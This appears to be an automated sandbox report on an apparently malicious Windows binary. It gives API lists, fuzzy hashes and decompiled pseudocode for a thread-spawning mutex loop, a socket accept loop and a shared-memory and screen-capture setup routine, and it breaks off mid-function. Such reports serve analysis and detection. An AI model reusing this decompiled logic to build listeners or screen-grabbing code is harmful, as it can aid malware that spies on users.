0x0041b861
0x0041b843
0x00000000
0x00000000
0x00000000
0x0041b817
0x0041b705
0x0041b705
0x0041b711
0x0041b711

APIs

Part of subcall function 004260D0: GetClassNameW.USER32 ref: 004260E5

GetWindowInfo.USER32 ref: 0041B75F
IntersectRect.USER32 ref: 0041B77E
GetDC.USER32(00000000), ref: 0041B824
CreateCompatibleDC.GDI32(00000000), ref: 0041B831
ReleaseDC.USER32 ref: 0041B83B
SelectObject.GDI32(00000000,00000001), ref: 0041B851
DeleteDC.GDI32(00000000), ref: 0041B864

Strings

<, xrefs: 0041B757

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassCompatibleCreateDeleteInfoIntersectNameObjectRectReleaseSelectWindow
String ID: <
API String ID: 641381948-4251816714
Opcode ID: c58f1be9aedeb7d7553343e3c96d7239b5d02985e06730e3a023ab0fac3322c2
Instruction ID: 64208ebbec11a43df5f580f43a37667e0e1a0976137c7c29a6c72b264bc0b616
Opcode Fuzzy Hash: c58f1be9aedeb7d7553343e3c96d7239b5d02985e06730e3a023ab0fac3322c2
Instruction Fuzzy Hash: 24C18F712083409FD320DF25C944BABBBE9EF89744F04491EF68597360D778D985CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC10, Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 342
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041AC10(void* __ecx, void* __edx, void* __eflags) {
				char _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				long _v84;
				void* _v88;
				void* _v92;
				void* _v96;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t56;
				long _t60;
				long _t62;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t77;
				long _t78;
				void _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t94;
				char* _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t122;
				void* _t132;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t145;
				WCHAR* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t156;
				void** _t158;

				_t158 =  &_v100;
				_t103 = E0041CDD0(__eflags, 0x743c1521, 2);
				_v76 = _t103;
				if(_t103 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t56 = WaitForSingleObject( *0x42edbc, 0);
					__eflags = _t56;
					if(_t56 != 0) {
						_t60 = WaitForSingleObject( *0x42edbc, 0xea60);
						__eflags = _t60 - 0x102;
						if(_t60 == 0x102) {
							do {
								_t141 = E0040C250();
								_v72 = _t141;
								__eflags = _t141;
								if(_t141 != 0) {
									_t132 = E00418BD0(2, 0x20000000, _t141);
									__eflags = _t132;
									if(_t132 != 0) {
										_t105 = E00418C20(_t132);
										_v76 = _t105;
										__eflags = _t105;
										if(_t105 != 0) {
											_t66 = E0041A630(_t65,  *((intOrPtr*)(_t132 + 0xc)));
											__eflags = _t66;
											if(_t66 != 0) {
												_v92 = _t105;
												while(1) {
													_t7 = _t105 + 1; // 0x1
													_t122 = _t7;
													_t143 = 0;
													_t112 = 0;
													__eflags = 0;
													_v80 = _t122;
													_t69 = _t122;
													while(1) {
														L11:
														__eflags =  *((char*)(_t69 - 1));
														if( *((char*)(_t69 - 1)) != 0) {
															goto L14;
														}
														L12:
														__eflags =  *_t69;
														if( *_t69 == 0) {
															_v96 = _t143;
														} else {
															_t112 = _t112 + 1;
															__eflags = _t112 - 1;
															if(_t112 == 1) {
																_v96 = _t69;
															} else {
																goto L14;
															}
														}
														_t113 = 0;
														__eflags = 0;
														_t70 = _t122;
														while(1) {
															__eflags =  *((char*)(_t70 - 1));
															if( *((char*)(_t70 - 1)) != 0) {
																goto L21;
															}
															L19:
															__eflags =  *_t70;
															if( *_t70 == 0) {
																_v100 = _t143;
															} else {
																_t113 = _t113 + 1;
																__eflags = _t113 - 2;
																if(_t113 == 2) {
																	_v100 = _t70;
																} else {
																	goto L21;
																}
															}
															__eflags = _t105 - _t143;
															if(_t105 != _t143) {
																__eflags =  *_t105;
																if( *_t105 != 0) {
																	do {
																		_t143 = _t143 + 1;
																		__eflags =  *((char*)(_t143 + _t105));
																	} while ( *((char*)(_t143 + _t105)) != 0);
																}
															}
															_t156 = E00412560(_v92, _t143);
															_t72 = _v96;
															_t144 = 0;
															__eflags = _t72;
															if(_t72 != 0) {
																__eflags =  *_t72;
																if( *_t72 != 0) {
																	do {
																		_t144 = _t144 + 1;
																		__eflags =  *((char*)(_t144 + _t72));
																	} while ( *((char*)(_t144 + _t72)) != 0);
																}
															}
															_t73 = E00412560(_v96, _t144);
															_t145 = 0;
															_t106 = _t73;
															__eflags = _v100;
															if(_v100 != 0) {
																_t101 = _v100;
																__eflags =  *_t101;
																if( *_t101 != 0) {
																	do {
																		_t145 = _t145 + 1;
																		__eflags =  *((char*)(_t145 + _t101));
																	} while ( *((char*)(_t145 + _t101)) != 0);
																}
															}
															_push(E00412560(_v100, _t145));
															_push(_t106);
															_push(_t156);
															_t146 =  &_v64;
															_t75 = E00411D10(_t74, 0x20, _t146, L"Global\\%08X%08X%08X");
															_t158 =  &(_t158[4]);
															__eflags = _t75 - 0x1f;
															if(_t75 == 0x1f) {
																_t77 = CreateMutexW(0x42e930, 1, _t146);
																_v88 = _t77;
																__eflags = _t77;
																if(_t77 != 0) {
																	_t78 = GetLastError();
																	__eflags = _t78 - 0xb7;
																	if(_t78 != 0xb7) {
																		_t107 = HeapAlloc( *0x42e6d4, 8, 0x14);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			L75:
																			_t147 = _v88;
																			ReleaseMutex(_t147);
																			_push(_t147);
																			goto L76;
																		} else {
																			_t137 = _v92;
																			__eflags = _t137;
																			if(_t137 != 0) {
																				_t148 = 0;
																				__eflags =  *_t137;
																				if( *_t137 != 0) {
																					do {
																						_t148 = _t148 + 1;
																						__eflags =  *((char*)(_t148 + _t137));
																					} while ( *((char*)(_t148 + _t137)) != 0);
																				}
																				_t29 = _t148 + 1; // 0x2
																				_t82 = _t29;
																				__eflags = _t82;
																				if(_t82 != 0) {
																					_t82 = HeapAlloc( *0x42e6d4, 8, _t82 + 4);
																					__eflags = _t82;
																					if(_t82 != 0) {
																						_t82 = E00410820(_t82, _t137, _t148);
																					}
																				}
																			} else {
																				_t82 = 0;
																			}
																			_t138 = _v96;
																			 *_t107 = _t82;
																			__eflags = _t138;
																			if(_t138 != 0) {
																				_t149 = 0;
																				__eflags =  *_t138;
																				if( *_t138 != 0) {
																					do {
																						_t149 = _t149 + 1;
																						__eflags =  *((char*)(_t149 + _t138));
																					} while ( *((char*)(_t149 + _t138)) != 0);
																				}
																				_t32 = _t149 + 1; // 0x2
																				_t83 = _t32;
																				__eflags = _t83;
																				if(_t83 != 0) {
																					_t83 = HeapAlloc( *0x42e6d4, 8, _t83 + 4);
																					__eflags = _t83;
																					if(_t83 != 0) {
																						_t83 = E00410820(_t83, _t138, _t149);
																					}
																				}
																			} else {
																				_t83 = 0;
																			}
																			_t139 = _v100;
																			 *(_t107 + 4) = _t83;
																			__eflags = _t139;
																			if(_t139 != 0) {
																				_t150 = 0;
																				__eflags =  *_t139;
																				if( *_t139 != 0) {
																					do {
																						_t150 = _t150 + 1;
																						__eflags =  *((char*)(_t150 + _t139));
																					} while ( *((char*)(_t150 + _t139)) != 0);
																				}
																				_t36 = _t150 + 1; // 0x2
																				_t84 = _t36;
																				__eflags = _t84;
																				if(_t84 != 0) {
																					_t84 = HeapAlloc( *0x42e6d4, 8, _t84 + 4);
																					__eflags = _t84;
																					if(_t84 != 0) {
																						_t84 = E00410820(_t84, _t139, _t150);
																					}
																				}
																			} else {
																				_t84 = 0;
																			}
																			__eflags =  *_t107;
																			 *(_t107 + 8) = _t84;
																			 *((intOrPtr*)(_t107 + 0xc)) = _v88;
																			if( *_t107 == 0) {
																				L68:
																				_t85 =  *_t107;
																				__eflags = _t85;
																				if(_t85 != 0) {
																					HeapFree( *0x42e6d4, 0, _t85);
																				}
																				_t86 =  *(_t107 + 4);
																				__eflags = _t86;
																				if(_t86 != 0) {
																					HeapFree( *0x42e6d4, 0, _t86);
																				}
																				_t87 =  *(_t107 + 8);
																				__eflags = _t87;
																				if(_t87 != 0) {
																					HeapFree( *0x42e6d4, 0, _t87);
																				}
																				HeapFree( *0x42e6d4, 0, _t107);
																				goto L75;
																			} else {
																				__eflags =  *(_t107 + 4);
																				if( *(_t107 + 4) == 0) {
																					goto L68;
																				} else {
																					__eflags = _t84;
																					if(_t84 == 0) {
																						goto L68;
																					} else {
																						_t94 = CreateThread(0, 0x80000, E0041A850, _t107, 0,  &_v84);
																						__eflags = _t94;
																						if(_t94 == 0) {
																							goto L68;
																						} else {
																							CloseHandle(_t94);
																							__eflags = _v88;
																							if(_v88 <= 0) {
																								goto L68;
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_push(_v88);
																		L76:
																		CloseHandle();
																	}
																}
															}
															_t76 = _v80;
															_t114 = 0;
															__eflags = 0;
															while(1) {
																__eflags =  *((char*)(_t76 - 1));
																if( *((char*)(_t76 - 1)) != 0) {
																	goto L81;
																}
																L79:
																__eflags =  *_t76;
																if( *_t76 != 0) {
																	_t114 = _t114 + 1;
																	__eflags = _t114 - 3;
																	if(_t114 == 3) {
																		_v92 = _t76;
																		_t105 = _t76;
																		_t7 = _t105 + 1; // 0x1
																		_t122 = _t7;
																		_t143 = 0;
																		_t112 = 0;
																		__eflags = 0;
																		_v80 = _t122;
																		_t69 = _t122;
																		L11:
																		__eflags =  *((char*)(_t69 - 1));
																		if( *((char*)(_t69 - 1)) != 0) {
																			goto L14;
																		}
																		goto L12;
																	} else {
																		goto L81;
																	}
																}
																goto L83;
																L81:
																_t76 = _t76 + 1;
																__eflags =  *((char*)(_t76 - 1));
																if( *((char*)(_t76 - 1)) != 0) {
																	goto L81;
																}
																goto L79;
															}
															L21:
															_t70 = _t70 + 1;
															__eflags =  *((char*)(_t70 - 1));
															if( *((char*)(_t70 - 1)) != 0) {
																goto L21;
															}
															goto L19;
														}
														L14:
														_t69 = _t69 + 1;
													}
												}
											}
											L83:
											HeapFree( *0x42e6d4, 0, _v76);
											_t141 = _v72;
										}
									}
									HeapFree( *0x42e6d4, 0, _t141);
									_t103 = _v68;
								}
								_t62 = WaitForSingleObject( *0x42edbc, 0xea60);
								__eflags = _t62 - 0x102;
							} while (_t62 == 0x102);
						}
					}
					ReleaseMutex(_t103);
					CloseHandle(_t103);
					__eflags = 0;
					return 0;
				} else {
					_t2 = _t103 + 1; // 0x1
					return _t2;
				}
			}

0x0041ac10
0x0041ac20
0x0041ac22
0x0041ac28
0x0041ac3e
0x0041ac52
0x0041ac54
0x0041ac56
0x0041ac68
0x0041ac6a
0x0041ac6f
0x0041ac80
0x0041ac85
0x0041ac87
0x0041ac8b
0x0041ac8d
0x0041aca2
0x0041aca4
0x0041aca6
0x0041acb1
0x0041acb3
0x0041acb7
0x0041acb9
0x0041acc2
0x0041acc7
0x0041acc9
0x0041accf
0x0041acd3
0x0041acd3
0x0041acd3
0x0041acd6
0x0041acd8
0x0041acd8
0x0041acda
0x0041acde
0x0041ace0
0x0041ace0
0x0041ace0
0x0041ace4
0x00000000
0x00000000
0x0041ace6
0x0041ace6
0x0041ace9
0x0041acf4
0x0041aceb
0x0041aceb
0x0041acec
0x0041acef
0x0041acfa
0x00000000
0x00000000
0x00000000
0x0041acef
0x0041acfe
0x0041acfe
0x0041ad00
0x0041ad02
0x0041ad02
0x0041ad06
0x00000000
0x00000000
0x0041ad08
0x0041ad08
0x0041ad0b
0x0041ad16
0x0041ad0d
0x0041ad0d
0x0041ad0e
0x0041ad11
0x0041ad1c
0x00000000
0x00000000
0x00000000
0x0041ad11
0x0041ad20
0x0041ad22
0x0041ad24
0x0041ad27
0x0041ad30
0x0041ad30
0x0041ad31
0x0041ad31
0x0041ad30
0x0041ad27
0x0041ad40
0x0041ad42
0x0041ad46
0x0041ad48
0x0041ad4a
0x0041ad4c
0x0041ad4f
0x0041ad51
0x0041ad51
0x0041ad52
0x0041ad52
0x0041ad51
0x0041ad4f
0x0041ad5c
0x0041ad61
0x0041ad63
0x0041ad65
0x0041ad69
0x0041ad6b
0x0041ad6f
0x0041ad72
0x0041ad74
0x0041ad74
0x0041ad75
0x0041ad75
0x0041ad74
0x0041ad72
0x0041ad84
0x0041ad85
0x0041ad86
0x0041ad91
0x0041ad95
0x0041ad9a
0x0041ad9d
0x0041ada0
0x0041adb0
0x0041adb6
0x0041adba
0x0041adbc
0x0041adc2
0x0041adc8
0x0041adcd
0x0041adec
0x0041adee
0x0041adf0
0x0041af47
0x0041af47
0x0041af4c
0x0041af52
0x00000000
0x0041adf6
0x0041adf6
0x0041adfa
0x0041adfc
0x0041ae02
0x0041ae04
0x0041ae07
0x0041ae10
0x0041ae10
0x0041ae11
0x0041ae11
0x0041ae10
0x0041ae17
0x0041ae17
0x0041ae1a
0x0041ae1c
0x0041ae2b
0x0041ae2d
0x0041ae2f
0x0041ae34
0x0041ae34
0x0041ae2f
0x0041adfe
0x0041adfe
0x0041adfe
0x0041ae39
0x0041ae3d
0x0041ae3f
0x0041ae41
0x0041ae47
0x0041ae49
0x0041ae4c
0x0041ae50
0x0041ae50
0x0041ae51
0x0041ae51
0x0041ae50
0x0041ae57
0x0041ae57
0x0041ae5a
0x0041ae5c
0x0041ae6a
0x0041ae6c
0x0041ae6e
0x0041ae73
0x0041ae73
0x0041ae6e
0x0041ae43
0x0041ae43
0x0041ae43
0x0041ae78
0x0041ae7c
0x0041ae7f
0x0041ae81
0x0041ae87
0x0041ae89
0x0041ae8c
0x0041ae90
0x0041ae90
0x0041ae91
0x0041ae91
0x0041ae90
0x0041ae97
0x0041ae97
0x0041ae9a
0x0041ae9c
0x0041aeab
0x0041aead
0x0041aeaf
0x0041aeb4
0x0041aeb4
0x0041aeaf
0x0041ae83
0x0041ae83
0x0041ae83
0x0041aeb9
0x0041aec0
0x0041aec3
0x0041aec6
0x0041aefe
0x0041aefe
0x0041af06
0x0041af08
0x0041af14
0x0041af14
0x0041af16
0x0041af19
0x0041af1b
0x0041af27
0x0041af27
0x0041af29
0x0041af2c
0x0041af2e
0x0041af39
0x0041af39
0x0041af45
0x00000000
0x0041aec8
0x0041aec8
0x0041aecc
0x00000000
0x0041aece
0x0041aece
0x0041aed0
0x00000000
0x0041aed2
0x0041aee6
0x0041aeec
0x0041aeee
0x00000000
0x0041aef0
0x0041aef1
0x0041aef7
0x0041aefc
0x00000000
0x00000000
0x0041aefc
0x0041aeee
0x0041aed0
0x0041aecc
0x0041aec6
0x0041adcf
0x0041add3
0x0041af53
0x0041af53
0x0041af53
0x0041adcd
0x0041adbc
0x0041af59
0x0041af5d
0x0041af5d
0x0041af60
0x0041af60
0x0041af64
0x00000000
0x00000000
0x0041af66
0x0041af66
0x0041af69
0x0041af6b
0x0041af6c
0x0041af6f
0x0041af74
0x0041af78
0x0041acd3
0x0041acd3
0x0041acd6
0x0041acd8
0x0041acd8
0x0041acda
0x0041acde
0x0041ace0
0x0041ace0
0x0041ace4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041af6f
0x00000000
0x0041af71
0x0041af71
0x0041af60
0x0041af64
0x00000000
0x00000000
0x00000000
0x0041af64
0x0041ad13
0x0041ad13
0x0041ad02
0x0041ad06
0x00000000
0x00000000
0x00000000
0x0041ad06
0x0041acf1
0x0041acf1
0x0041acf1
0x0041ace0
0x0041acd3
0x0041af7f
0x0041af92
0x0041af94
0x0041af94
0x0041acb9
0x0041afa2
0x0041afaa
0x0041afaa
0x0041afba
0x0041afbc
0x0041afbc
0x0041afc8
0x0041ac6f
0x0041afca
0x0041afd1
0x0041afd8
0x0041afde
0x0041ac2a
0x0041ac2a
0x0041ac31
0x0041ac31

APIs

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

GetCurrentThread.KERNEL32 ref: 0041AC37
SetThreadPriority.KERNEL32(00000000,?,743C1521,00000002), ref: 0041AC3E
WaitForSingleObject.KERNEL32(?,00000000,?,743C1521,00000002), ref: 0041AC52
WaitForSingleObject.KERNEL32(?,0000EA60,?,743C1521,00000002), ref: 0041AC68

Strings

Global\%08X%08X%08X, xrefs: 0041AD87

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$Thread$CloseCreateCurrentHandleMutexPriority
String ID: Global\%08X%08X%08X
API String ID: 3192181034-3239447729
Opcode ID: 5ec1dfd168cf881e30e68d6ee939cfd63e9930cf43f89443a4970bb87441ca1e
Instruction ID: a1a078a3edac850bf5601f71e49d0461410788ac144138eb2557eb6316941d36
Opcode Fuzzy Hash: 5ec1dfd168cf881e30e68d6ee939cfd63e9930cf43f89443a4970bb87441ca1e
Instruction Fuzzy Hash: 21B113B0645341AFD721CB60DC84BA777D9AB98700F14082EF941E7291D738DCD2C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00407050, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 218
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00407050(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v78;
				signed int _v82;
				char _v124;
				char _v128;
				char _v132;
				void* _v140;
				void* _v144;
				void* _v152;
				void* _v156;
				char _v160;
				void* _v164;
				char _v168;
				void* _v176;
				long _v180;
				long _v192;
				int _v196;
				long _v228;
				void* _v232;
				intOrPtr _v260;
				void* __edi;
				void* __esi;
				void* _t54;
				void* _t62;
				void* _t63;
				long _t65;
				intOrPtr _t69;
				void* _t70;
				void* _t76;
				long _t79;
				void* _t85;
				intOrPtr* _t87;
				intOrPtr* _t110;
				void* _t113;
				signed int _t115;
				long _t116;
				char _t117;
				char _t118;
				void* _t119;
				intOrPtr* _t123;
				signed int _t125;
				void* _t127;

				_t127 = (_t125 & 0xfffffff8) - 0xb0;
				_push(_t113);
				_t85 = E0041CDD0(__eflags, 0x743c152e, 2);
				_v156 = _t85;
				if(_t85 != 0) {
					_t54 = WaitForSingleObject( *0x42edbc, 0);
					__eflags = _t54;
					if(_t54 != 0) {
						E0041A440(_t113,  &_v124);
						_push( &_v168);
						_t115 = E00406D40(_v78,  &_v160) & 0x0000ffff;
						__eflags = _t115;
						if(_t115 != 0) {
							L8:
							__eflags = _t115 - _v78;
							if(_t115 != _v78) {
								E0041A520( &_v128);
								_v82 = _t115;
								E0041A5C0( &_v132);
							}
							_t62 = _v156;
							_t116 = 1;
							_v144 =  *0x42edbc;
							_v180 = 1;
							__eflags = _t62;
							if(_t62 != 0) {
								_v180 = 2;
								_t116 = _v180;
								_v140 = _t62;
							}
							_t63 = _v164;
							__eflags = _t63;
							if(_t63 != 0) {
								 *(_t127 + 0x38 + _t116 * 4) = _t63;
								_t116 = _t116 + 1;
								__eflags = _t116;
								_v180 = _t116;
							}
							_t65 = WaitForMultipleObjects(_t116,  &_v144, 0, 0xffffffff);
							__eflags = _t65;
							if(_t65 != 0) {
								_t110 = __imp__WSAEventSelect;
								_t87 = __imp__WSAIoctl;
								_t123 = __imp__#21;
								while(1) {
									__eflags = _t65 - _t116;
									if(_t65 >= _t116) {
										break;
									}
									_t69 =  *((intOrPtr*)(_t127 + 0x38 + _t65 * 4));
									__eflags = _t69 - _v156;
									if(_t69 != _v156) {
										__eflags = _t69 - _v164;
										if(_t69 == _v164) {
											_v176 = _v168;
										}
									} else {
										_v176 = _v160;
									}
									_t70 = _v176;
									__imp__#1(_t70, 0, 0);
									_t119 = _t70;
									__eflags = _t119 - 0xffffffff;
									while(_t119 != 0xffffffff) {
										 *_t110(_t119, 0, 0);
										_v196 = 0;
										 *_t87(_t119, 0x8004667e,  &_v196, 4, 0, 0,  &_v156, 0, 0);
										_v232 = 1;
										 *_t123(_t119, 6, 1,  &_v232, 4);
										_t76 = CreateThread(0, 0x20000, E00406F20, _t119, 0,  &_v228);
										__eflags = _t76;
										if(_t76 == 0) {
											L25:
											__eflags = _t119 - 0xffffffff;
											if(_t119 != 0xffffffff) {
												__imp__#22(_t119, 2);
												__imp__#3(_t119);
											}
										} else {
											_t76 = CloseHandle(_t76);
											__eflags = _v232;
											if(_v232 == 0) {
												goto L25;
											}
										}
										__imp__#1(_v260, 0, 0);
										_t119 = _t76;
										__eflags = _t119 - 0xffffffff;
									}
									_t65 = WaitForMultipleObjects(_v192,  &_v156, 0, 0xffffffff);
									__eflags = _t65;
									if(_t65 != 0) {
										_t116 = _v192;
										continue;
									}
									break;
								}
								_t85 = _v152;
							}
							_t117 = _v160;
							__eflags = _t117 - 0xffffffff;
							if(_t117 != 0xffffffff) {
								__imp__#22(_t117, 2);
								__imp__#3(_t117);
							}
							CloseHandle(_v156);
							_t118 = _v168;
							__eflags = _t118 - 0xffffffff;
							if(_t118 != 0xffffffff) {
								__imp__#22(_t118, 2);
								__imp__#3(_t118);
							}
							CloseHandle(_v164);
						} else {
							while(1) {
								_t79 = WaitForSingleObject( *0x42edbc, 0x3e8);
								__eflags = _t79 - 0x102;
								if(_t79 != 0x102) {
									break;
								}
								_push( &_v168);
								_t115 = E00406D40(_v78,  &_v160) & 0x0000ffff;
								__eflags = _t115;
								if(_t115 == 0) {
									continue;
								} else {
									goto L8;
								}
								goto L36;
							}
							__eflags = _t115;
							if(_t115 == 0) {
								goto L35;
							} else {
								goto L8;
							}
						}
					}
					L36:
					ReleaseMutex(_t85);
					CloseHandle(_t85);
					__eflags = 0;
					return 0;
				} else {
					_t2 = _t85 + 1; // 0x1
					return _t2;
				}
			}

0x00407056
0x0040705e
0x0040706c
0x0040706e
0x00407074
0x00407091
0x00407093
0x00407095
0x004070a0
0x004070a9
0x004070bb
0x004070be
0x004070c1
0x00407101
0x00407101
0x00407106
0x0040710d
0x00407116
0x0040711b
0x0040711b
0x00407120
0x0040712a
0x0040712f
0x00407133
0x00407137
0x00407139
0x0040713b
0x00407143
0x00407147
0x00407147
0x0040714b
0x0040714f
0x00407151
0x00407153
0x00407157
0x00407157
0x00407158
0x00407158
0x00407166
0x0040716c
0x0040716e
0x00407174
0x0040717a
0x00407180
0x00407194
0x00407194
0x00407196
0x00000000
0x00000000
0x0040719c
0x004071a0
0x004071a4
0x004071b0
0x004071b4
0x004071ba
0x004071ba
0x004071a6
0x004071aa
0x004071aa
0x004071be
0x004071c7
0x004071cd
0x004071cf
0x004071d2
0x004071dd
0x004071f9
0x00407201
0x0040720f
0x00407217
0x0040722d
0x00407233
0x00407235
0x00407245
0x00407245
0x00407248
0x0040724d
0x00407254
0x00407254
0x00407237
0x00407238
0x0040723e
0x00407243
0x00000000
0x00000000
0x00407243
0x00407263
0x00407269
0x0040726b
0x0040726b
0x00407282
0x00407288
0x0040728a
0x00407190
0x00000000
0x00407190
0x00000000
0x0040728a
0x00407290
0x00407290
0x00407294
0x00407298
0x0040729b
0x004072a0
0x004072a7
0x004072a7
0x004072b8
0x004072ba
0x004072be
0x004072c1
0x004072c6
0x004072cd
0x004072cd
0x004072d8
0x004070c3
0x004070c3
0x004070cf
0x004070d1
0x004070d6
0x00000000
0x00000000
0x004070dc
0x004070ee
0x004070f1
0x004070f4
0x00000000
0x004070f6
0x00000000
0x004070f6
0x00000000
0x004070f4
0x004070f8
0x004070fb
0x00000000
0x00000000
0x00000000
0x00000000
0x004070fb
0x004070c1
0x004072e2
0x004072e3
0x004072ea
0x004072ed
0x004072f5
0x00407076
0x00407076
0x00407080
0x00407080

APIs

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

WaitForSingleObject.KERNEL32(?,00000000,743C152E,00000002), ref: 00407091
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?), ref: 004070CF
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,?,?,?), ref: 00407166
accept.WS2_32(?,00000000,00000000), ref: 004071C7
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 004071DD

Strings

p0u, xrefs: 00407254, 004072A7, 004072CD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Wait$ObjectSingle$CloseCreateEventHandleMultipleMutexObjectsSelectaccept
String ID: p0u
API String ID: 268361317-1742372003
Opcode ID: f59204b01dd786d86b65e30aadce258c6abfa655c4586cb7d000de9a3bbed0dc
Instruction ID: 8262971fe96d87697c8d2cf5d2e263d8d35bee536380b65278ab02157ada572d
Opcode Fuzzy Hash: f59204b01dd786d86b65e30aadce258c6abfa655c4586cb7d000de9a3bbed0dc
Instruction Fuzzy Hash: 16718771609300ABD310DB64DC45F5BB7E8AB84754F100A2EFA55B72E0D774ED058BAB

Uniqueness

Uniqueness Score: -1.00%

Function 00426210, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224
fileregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00426210(void** __esi) {
				intOrPtr _v24;
				char _v712;
				char _v828;
				void* _v1162;
				char _v1472;
				char _v1600;
				char _v1628;
				char _v1704;
				short _v1716;
				char _v1736;
				char _v1756;
				short _v1768;
				void* _t53;
				long _t55;
				int _t61;
				void* _t68;
				void* _t74;
				void* _t77;
				void* _t78;
				int _t83;
				void* _t85;
				void* _t98;
				struct HDC__* _t100;
				void* _t102;
				void* _t103;
				int _t104;
				signed char _t114;
				signed int _t116;
				struct HDC__* _t131;
				struct HDC__* _t132;
				void** _t133;

				_t133 = __esi;
				E00410870(_t53, __esi, 0, 0x18c);
				_t55 = TlsAlloc();
				__esi[1] = _t55;
				if(_t55 != 0xffffffff) {
					E0041D150( &_v1600);
					E00416E10(0x42eb70,  &_v1472,  *0x42e904,  &_v1704, 0);
					_t61 = RegisterWindowMessageW( &_v1716);
					__esi[2] = _t61;
					if(_t61 == 0) {
						goto L1;
					} else {
						E0041D150( &_v1600);
						E00416E10(0x42eb70,  &_v1472,  *0x42e904,  &_v1704, 1);
						_t68 = CreateEventW(0x42e930, 1, 0,  &_v1716);
						__esi[3] = _t68;
						if(_t68 == 0) {
							goto L1;
						} else {
							E0041D150( &_v1600);
							E00416E10(0x42eb70,  &_v1472,  *0x42e904,  &_v1704, 1);
							_t74 = CreateMutexW(0x42e930, 0,  &_v1716);
							__esi[5] = _t74;
							if(_t74 == 0) {
								goto L1;
							} else {
								E0041CD80(0x9878a222,  &_v1704, 1);
								_t77 = CreateFileMappingW(0, 0x42e930, 4, 0, 0x3d09128,  &_v1716);
								 *__esi = _t77;
								if(_t77 == 0) {
									goto L1;
								} else {
									_t78 = MapViewOfFile(_t77, 2, 0, 0, 0);
									if(_t78 == 0) {
										goto L1;
									} else {
										__esi[4] = _t78;
										__esi[6] = _t78 + 0x128;
										_t104 = 0;
										_t131 = GetDC(0);
										if(_t131 == 0) {
											L22:
											return _t104;
										} else {
											__esi[9] = 0;
											__esi[0xa] = 0;
											__esi[0xb] = GetDeviceCaps(_t131, 8);
											_t83 = GetDeviceCaps(_t131, 0xa);
											__esi[0xc] = _t83;
											if(CreateCompatibleBitmap(_t131, __esi[0xb], _t83) == 0) {
												_t85 = 0;
											} else {
												_push(0);
												_push(0);
												_t26 =  &(_t133[8]); // 0x42eec0
												_push( &_v1736);
												_t85 = E00419A20(_t84, _t131);
											}
											_t133[7] = _t85;
											ReleaseDC(0, _t131);
											if(_t133[7] == 0) {
												goto L22;
											} else {
												_t87 = _v1736;
												_t114 =  *(_v1736 + 0xe) >> 3;
												_t133[0xe] = _t114;
												_t116 = (_t114 & 0x000000ff) * _t133[0xb];
												_t133[0xd] = _t116;
												if((_t116 & 0x00000003) != 0) {
													_t116 = (_t116 & 0xfffffffc) + 4;
												}
												_t133[0xd] = _t116;
												E004107C0(_t87);
												_t104 = 1;
												if(_v24 != 1) {
													goto L22;
												} else {
													_t104 = 0;
													E0041D150( &_v828);
													E0041D1B0( &_v1628);
													_t41 =  &(_t133[0xf]); // 0x42eedc
													E00410820(_t41, 0x42eb70, 0x10);
													_t44 =  &(_t133[0x14]); // 0x42eef0
													_t133[0x13] = _v1162;
													E00410820(_t44,  &_v712, 0x102);
													E0041CD80(0x1898b122,  &_v1756, 1);
													_t98 = CreateMutexW(0x42e930, 0,  &_v1768);
													_t133[0x58] = _t98;
